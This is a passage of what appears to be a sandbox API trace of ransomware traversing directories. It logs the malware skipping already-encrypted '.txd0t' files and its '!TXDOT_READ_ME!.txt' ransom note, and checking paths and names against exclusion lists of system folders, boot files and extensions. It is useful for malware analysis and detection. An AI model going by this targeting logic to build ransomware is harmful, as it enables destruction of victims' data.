psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0115.945] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0115.945] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t" [0115.945] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0115.945] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.945] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11b8c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0115.945] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0115.945] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0115.945] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0115.945] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0115.945] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.txd0t" [0115.945] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0115.945] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0115.945] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0115.945] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0115.945] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0115.945] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0115.945] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0115.945] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" [0115.945] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.945] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0115.945] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0115.945] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0115.945] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0115.946] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0115.946] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0115.946] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0115.946] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0115.946] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0115.967] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0115.968] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0115.985] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0115.985] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0115.985] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0115.985] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0115.985] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0115.991] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0115.991] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0115.992] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0115.996] GetProcessHeap () returned 0xe30000 [0115.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0115.996] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5847eb78, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5847eb78, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1038", cAlternateFileName="")) returned 1 [0115.996] StrCmpW (psz1="1038", psz2=".") returned 1 [0116.006] StrCmpW (psz1="1038", psz2="..") returned 1 [0116.017] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.017] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.024] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1038", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0116.024] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\system32\\") returned 0x0 [0116.024] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.024] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\system\\") returned 0x0 [0116.024] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.024] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.028] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\local\\") returned 0x0 [0116.028] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.041] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.041] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.044] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\boot\\") returned 0x0 [0116.045] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\perflogs\\") returned 0x0 [0116.045] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\programdata\\") returned 0x0 [0116.049] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\drivers\\") returned 0x0 [0116.049] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\wsus\\") returned 0x0 [0116.049] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.049] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.049] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="crypt_detect") returned 0x0 [0116.061] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="cryptolocker") returned 0x0 [0116.061] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="ransomware") returned 0x0 [0116.061] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\WINDOWS") returned 0x0 [0116.061] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.061] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\Program Files") returned 0x0 [0116.061] GetProcessHeap () returned 0xe30000 [0116.065] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.065] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0116.066] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\*") returned="C:\\588bce7c90097ed212\\1038\\*" [0116.066] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5847eb78, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5847eb78, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b30 [0116.081] StrCmpW (psz1=".", psz2=".") returned 0 [0116.081] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5847eb78, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5847eb78, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.090] StrCmpW (psz1="..", psz2=".") returned 1 [0116.090] StrCmpW (psz1="..", psz2="..") returned 0 [0116.090] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5834b1e1, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5834b1e1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58371386, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.090] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.094] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.094] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0116.094] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0116.102] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1038\\!TXDOT_READ_ME!.txt" [0116.102] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.103] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.139] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.146] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.147] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.153] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.153] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.153] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.153] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.159] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.159] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.159] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.159] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.159] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.168] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5834b1e1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x129e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.168] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.179] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.179] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0116.179] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0116.179] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1038\\eula.rtf.txd0t" [0116.179] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.186] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.186] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58478a65, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x153aa, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.192] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.192] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.192] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0116.199] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0116.199] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.txd0t" [0116.199] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.293] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.293] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.293] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.293] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.293] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0116.293] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\") returned="C:\\588bce7c90097ed212\\1038\\" [0116.293] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" [0116.293] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.293] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.293] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.294] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.294] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.294] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.294] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.294] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.294] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.294] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.294] FindClose (in: hFindFile=0xec1b30 | out: hFindFile=0xec1b30) returned 1 [0116.294] GetProcessHeap () returned 0xe30000 [0116.294] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.294] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5848a111, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5848a111, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1040", cAlternateFileName="")) returned 1 [0116.294] StrCmpW (psz1="1040", psz2=".") returned 1 [0116.294] StrCmpW (psz1="1040", psz2="..") returned 1 [0116.294] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.294] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.294] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1040", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0116.294] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\system32\\") returned 0x0 [0116.294] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.294] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\system\\") returned 0x0 [0116.294] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.294] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.294] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\local\\") returned 0x0 [0116.294] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\boot\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\perflogs\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\programdata\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\drivers\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\wsus\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="crypt_detect") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="cryptolocker") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="ransomware") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\WINDOWS") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.295] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1040", lpSrch="C:\\Program Files") returned 0x0 [0116.295] GetProcessHeap () returned 0xe30000 [0116.295] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.295] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1040", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040") returned="C:\\588bce7c90097ed212\\1040" [0116.295] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1040", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1040\\*") returned="C:\\588bce7c90097ed212\\1040\\*" [0116.295] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5848a111, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5848a111, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0116.295] StrCmpW (psz1=".", psz2=".") returned 0 [0116.295] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5848a111, ftLastAccessTime.dwHighDateTime=0x1d64bcf, 